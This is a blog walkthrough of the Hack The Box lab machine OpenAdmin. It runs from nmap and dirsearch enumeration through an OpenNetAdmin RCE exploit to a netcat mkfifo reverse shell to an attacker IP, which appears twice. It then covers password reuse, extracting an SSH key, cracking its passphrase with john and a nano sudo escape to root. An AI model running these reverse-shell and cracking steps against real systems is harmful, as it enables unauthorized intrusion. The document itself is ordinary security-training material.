Open in app

Sign in

Write

Sign in

HTB OpenAdmin — Walkthrough

Vaibhav Joshi
4 min readJun 14, 2021

ENUMERATION

So let’s start enumeration with nmap scan

# nmap -A 10.10.10.171
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

Apache is running on port 80, on visiting found that there is Apache default page without any information

Running directory brute forcing

# python3 dirsearch.py -u http://10.10.10.171/ -e / -t 50Extensions: / | HTTP method: get | Threads: 50 | Wordlist size: 6122Target: http://10.10.10.171/[07:40:24] Starting: 
[07:40:30] 200 -   11KB - /
[07:40:53] 200 -   11KB - /index.html
[07:40:57] 301 -  312B  - /music  ->  http://10.10.10.171/music/Task Completed

On visiting found directory /music, found many functionality after using all that nothing interesting was found. But when clicked on Login, it redirected to /ona/

where found that it is OpenNetAdmin 18.1.1 which is vulnerable to RCE

Initial Shell

The exploit I used is here

# python3 exploit.py exploit http://10.10.10.171/ona/

To get reverse shell I used netcat

# nc -vlp 443 //in attacker machine$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.196 443 >/tmp/f //in OpenAdmin machine

Privilege Escalate— jimmy

After some searching on google found that the database credentials are stored in /opt/ona/www/local/config/database_settings.inc.php in plaintext

ona_sys : n1nj4W4rri0R!

But no interesting information is found inside database, inside /home directory I found that there are two users jimmy and joanna, so I tried the database password as in case the same password is used for user account too

And found that the same password is used for user account jimmy

jimmy : n1nj4W4rri0R!

Privilege Escalate — joanna

When I was enumerating from www-data I found that a directory /var/www/internal which cannot be accessed by www-data, but can be accessed with user jimmy

drwxrwx---  2 jimmy    internal 4096 Nov 23 17:43 internal

Inside that there are 3 file

-rwxrwxr-x 1 jimmy internal 3229 Nov 22 23:24 index.php
-rwxrwxr-x 1 jimmy internal  185 Nov 23 16:37 logout.php
-rwxrwxr-x 1 jimmy internal  339 Nov 23 17:40 main.php

The content of main.php seems interesting and looks like the way to user joanna

# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

It looks like a application here but was not found during web enumeration and also not found any related to port 80, so I tried to find out if there is any addional port which is open

It is found that the port 52846 is only open internally that is for localhost only, I tried to access main.php on this port with the help of curl

$ curl -s localhost:52846/main.php
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED...-----END RSA PRIVATE KEY-----
</pre><html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

And found the private key for user joanna, but it needs passphrase to login so I cracked that with john

// Converting the key to hash to crack the passphrase
# python3 /usr/share/john/ssh2john.py joanna-ssh > hash//Brute force to get passphrase with rockyou.txt
# john hash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for statusbloodninjas      (joanna-ssh)

Session completed

Found passphrase as bloodninjas and successfully logged in with the ssh key

# ssh joanna@10.10.10.171 -i joanna-ssh 
Enter passphrase for key 'joanna-ssh':bloodninjas

user.txt = c9b2cf07d********af62660f0c81b5f

Privilege Escalate — root

It was pretty straight forward, when I checked for sudo permission found that

(ALL) NOPASSWD: /bin/nano /opt/priv

To read root.txt

$ sudo /bin/nano /opt/priv
ctrl + R                       //Read file option in nano
/root/root.txt                 //In the field when nano ask for name

To get root shell

$ sudo /bin/nano /opt/priv
ctrl + R                       //Read file option in nano
ctlr + X                       //Execute command option in nano
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.196 443 >/tmp/f                    //In the field when nano ask for command# nc -lvp 443                  // In attacker machine

root.txt = 2f907ed450b3********4e8795d5b561

--

--

Vaibhav Joshi

Written by Vaibhav Joshi

86 Followers

Security Researcher | OSCP

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams